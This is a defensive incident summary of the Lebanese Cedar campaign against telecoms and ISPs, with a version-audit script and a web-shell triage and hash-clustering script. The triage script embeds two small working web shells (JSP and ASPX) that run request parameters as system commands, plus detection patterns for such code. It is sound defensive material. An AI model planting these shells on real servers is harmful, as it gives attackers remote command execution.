Date: Jan 2020

Location: Israel

Summary

Lebanese Cedar, a Hezbollah-affiliated threat actor group, ran a year-long cyber-espionage campaign against telecommunications operators and ISPs in several countries. The group gained initial access by exploiting known, unpatched vulnerabilities in internet-facing servers and planting web shells, then moved laterally into internal networks and deployed the Explosive RAT to exfiltrate sensitive data, including private documents and potentially call records and customer data. The objective was intelligence gathering and theft of company databases; no destructive activity was observed.


Description

The Lebanese Cedar threat group, affiliated with Hezbollah's cyber unit, conducted a year-long hacking campaign beginning in early 2020 against telecommunications providers and internet service providers in multiple countries. Israeli cybersecurity firm ClearSky discovered the campaign and identified at least 250 compromised web servers globally. The attackers began by scanning the internet for unpatched Atlassian Confluence, Atlassian Jira, and Oracle Fusion Middleware servers and exploiting publicly known vulnerabilities to gain initial access: CVE-2019-3396 (Confluence), CVE-2019-11581 (Jira), and CVE-2012-3152 (Oracle Fusion). Vendor fixes for all three had been available for months to years before the campaign started, so the entry point was patch hygiene on exposed collaboration and middleware servers rather than any novel technique. Once on an external system, the operators deployed web shells such as ASPXSpy, Caterpillar 2, Mamad Warning, and a modified JSP file browser tool to maintain persistence. The campaign's primary objective was intelligence gathering and theft of sensitive databases, with telecommunications companies' call records and customer data identified as high-value targets.
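The check a defender would want after reading the paragraph above is whether any of their own Confluence or Jira Server instances still sit on a release that predates the fixes. The script below is an added example, not code from this page or from ClearSky: it audits a constructed version inventory against the earliest patched release on each affected branch, with the fixed-version lists taken from Atlassian's public advisories for CVE-2019-3396 and CVE-2019-11581. The hostnames and versions in the sample inventory are made up; Oracle Fusion (CVE-2012-3152) is not covered here.

```python
"""Audit Confluence / Jira Server version strings against the fixed releases
for CVE-2019-3396 and CVE-2019-11581.

Added example, not ClearSky's or Atlassian's code. Fixed versions are taken
from Atlassian's public advisories; the inventory below is constructed data.
"""
from __future__ import annotations

# Earliest patched release on each affected branch, per the vendor advisories.
FIXED = {
    "CVE-2019-3396": {   # Confluence Server/Data Center, widget connector SSTI
        "product": "confluence",
        "fixes": ["6.6.12", "6.12.3", "6.13.3", "6.14.2"],
    },
    "CVE-2019-11581": {  # Jira Server/Data Center, ContactAdministrators SSTI
        "product": "jira",
        "fixes": ["7.6.14", "7.13.5", "8.0.3", "8.1.2", "8.2.3"],
    },
}


def parse_version(v: str) -> tuple[int, ...]:
    """'6.13.3-ga' -> (6, 13, 3); missing components are padded with 0."""
    parts = []
    for piece in v.split("."):
        digits = "".join(ch for ch in piece if ch.isdigit())
        parts.append(int(digits) if digits else 0)
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def is_exposed(version: str, fixes: list[str]) -> bool:
    """True if `version` is below the fix on its own major.minor branch, or sits
    on a branch that never received a fix and is older than the newest fixed line."""
    v = parse_version(version)
    fixed = sorted(parse_version(f) for f in fixes)
    if v >= fixed[-1]:
        return False                      # at or beyond the newest fixed line
    same_branch = [f for f in fixed if f[:2] == v[:2]]
    if same_branch:
        return v < same_branch[0]         # compare against the fix for this branch
    return True                           # branch was never patched (e.g. Confluence 6.7-6.11)


def audit(inventory: list[dict]) -> list[tuple[str, str, str]]:
    """Return (host, 'product version', cve) for every exposed server."""
    findings = []
    for server in inventory:
        for cve, info in FIXED.items():
            if server["product"] == info["product"] and is_exposed(server["version"], info["fixes"]):
                findings.append((server["host"], f'{server["product"]} {server["version"]}', cve))
    return findings


# Constructed sample inventory; hostnames and versions are not from the page.
SAMPLE_INVENTORY = [
    {"host": "wiki.example.net",  "product": "confluence", "version": "6.13.1"},
    {"host": "wiki2.example.net", "product": "confluence", "version": "6.14.2"},
    {"host": "wiki3.example.net", "product": "confluence", "version": "6.9.0"},
    {"host": "jira.example.net",  "product": "jira",       "version": "8.2.2"},
    {"host": "jira2.example.net", "product": "jira",       "version": "8.3.0"},
]

if __name__ == "__main__":
    for host, what, cve in audit(SAMPLE_INVENTORY):
        print(f"{host}: {what} is exposed to {cve}")
```

A version below the newest fix is treated as exposed unless its own branch carries a fix it has reached; that is why 6.9.0 is flagged even though it is "newer" than 6.6.12. For CVE-2019-11581 the advisory also notes that exploitation without credentials requires an SMTP server to be configured and the Contact Administrators form to be enabled, so a hit here is an exposure, not proof of compromise.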


After establishing footholds on internet-facing systems, the attackers pivoted into internal networks, where they deployed the Explosive remote access trojan (RAT), a tool historically exclusive to Lebanese Cedar operations. The malware was used for systematic exfiltration of private corporate documents. Operational security lapses by the attackers, in particular the reuse of identical files across intrusions, allowed ClearSky to tie the intrusions together and to the group by fingerprinting and hash-matching artefacts across 135 of the infected servers. Confirmed victims included Vodafone Egypt, Etisalat UAE, SaudiNet, and US-based Frontier Communications. ClearSky's investigation found no evidence of disruptive payloads, indicating purely espionage-motivated activity. The firm's analysis described sectoral and geographical targeting patterns and its discovery methodology, but did not disclose the containment measures taken by the affected organizations.
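The two defensive steps implied by this description, finding the web shells left on the edge servers and then using their hashes to link one intrusion to another, can be done with a small triage script. The following is an added example and not ClearSky's tooling: it walks each host's web application directory for script files carrying command-execution capabilities, then clusters identical files across hosts by SHA-256, which is the "file reuse across intrusions" that made attribution possible here. The hostnames, paths, file contents and the token list are constructed for the demo; the tokens are a generic web-shell heuristic, not a signature for ASPXSpy, Caterpillar 2 or Mamad Warning.

```python
"""Triage script files under a web root for web-shell traits, then cluster
identical files across hosts by SHA-256.

Added example, not ClearSky's own tooling. Hosts, paths and file contents
are constructed so the script runs offline; the patterns are a generic
heuristic, not signatures for the shells named in the text.
"""
from __future__ import annotations
import hashlib
import re
import tempfile
from collections import defaultdict
from pathlib import Path

SCRIPT_EXT = {".jsp", ".jspx", ".aspx", ".asp", ".ashx", ".php"}

# Capabilities a page shipped with a product webapp rarely needs.
SUSPICIOUS = [
    re.compile(rb"Runtime\.getRuntime\(\)\.exec"),
    re.compile(rb"ProcessBuilder"),
    re.compile(rb"Process\.Start|ProcessStartInfo"),
    re.compile(rb"eval\s*\(\s*Request"),
    # request parameter flowing into a process launch, anywhere in the file
    re.compile(rb"request\.getParameter\([^)]*\).*(exec|ProcessBuilder)", re.S),
]


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def triage_host(host: str, webroot: Path) -> list[dict]:
    """One record per script file under `webroot` that matches any pattern."""
    hits = []
    for p in webroot.rglob("*"):
        if not p.is_file() or p.suffix.lower() not in SCRIPT_EXT:
            continue
        data = p.read_bytes()
        matched = [r.pattern.decode() for r in SUSPICIOUS if r.search(data)]
        if matched:
            hits.append({"host": host, "path": p.relative_to(webroot).as_posix(),
                         "sha256": sha256_bytes(data), "matched": matched})
    return hits


def cluster_by_hash(records: list[dict]) -> dict[str, list[str]]:
    """sha256 -> sorted hosts on which a byte-identical file was found.
    Only hashes seen on more than one host are returned: those are the
    artefacts that let separate intrusions be tied to one operator."""
    clusters: dict[str, set] = defaultdict(set)
    for r in records:
        clusters[r["sha256"]].add(r["host"])
    return {h: sorted(hs) for h, hs in clusters.items() if len(hs) > 1}


# Constructed sample files: a JSP shell reused on two hosts, an ASPX shell on a
# third, and a benign page everywhere. None of this is real victim data.
SHELL_JSP = (b'<%@ page import="java.io.*" %><% String c = request.getParameter("cmd");'
             b' if (c != null) { Process p = Runtime.getRuntime().exec(c);'
             b' BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));'
             b' String l; while ((l = r.readLine()) != null) out.println(l); } %>')
SHELL_ASPX = (b'<%@ Page Language="C#" %><script runat="server">void Page_Load(object s, EventArgs e){'
              b' var psi = new System.Diagnostics.ProcessStartInfo("cmd.exe", "/c " + Request["c"]);'
              b' System.Diagnostics.Process.Start(psi); }</script>')
BENIGN_PAGE = b'<%@ page contentType="text/html" %><html><body><h1>Status: OK</h1></body></html>'


def build_sample_hosts(base: Path) -> dict[str, Path]:
    layout = {
        "telco-a-web01": {"index.jsp": BENIGN_PAGE, "help/log.jsp": SHELL_JSP},
        "isp-b-portal":  {"index.jsp": BENIGN_PAGE, "rest/sync.jsp": SHELL_JSP},
        "telco-c-crm":   {"default.aspx": BENIGN_PAGE, "img/view.aspx": SHELL_ASPX},
    }
    roots = {}
    for host, files in layout.items():
        root = base / host
        for rel, content in files.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_bytes(content)
        roots[host] = root
    return roots


def run_demo() -> tuple[list[dict], dict[str, list[str]]]:
    """Build the sample hosts in a temp dir, triage them, and cluster the hits."""
    with tempfile.TemporaryDirectory() as tmp:
        roots = build_sample_hosts(Path(tmp))
        records = [r for host, root in roots.items() for r in triage_host(host, root)]
        return records, cluster_by_hash(records)


if __name__ == "__main__":
    records, clusters = run_demo()
    for r in records:
        print(f'{r["host"]}:{r["path"]} {r["sha256"][:12]} {r["matched"]}')
    for digest, hosts in clusters.items():
        print(f"reused artefact {digest[:12]} on {', '.join(hosts)}")
```

On a real engagement the web roots would be the Confluence, Jira or IIS application directories pulled from each host, and the hash clusters would be checked against shells recovered from other victims; exact-hash matching only catches byte-identical reuse, so a second pass with fuzzy hashing is usually worth it once the exact matches have been triaged.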
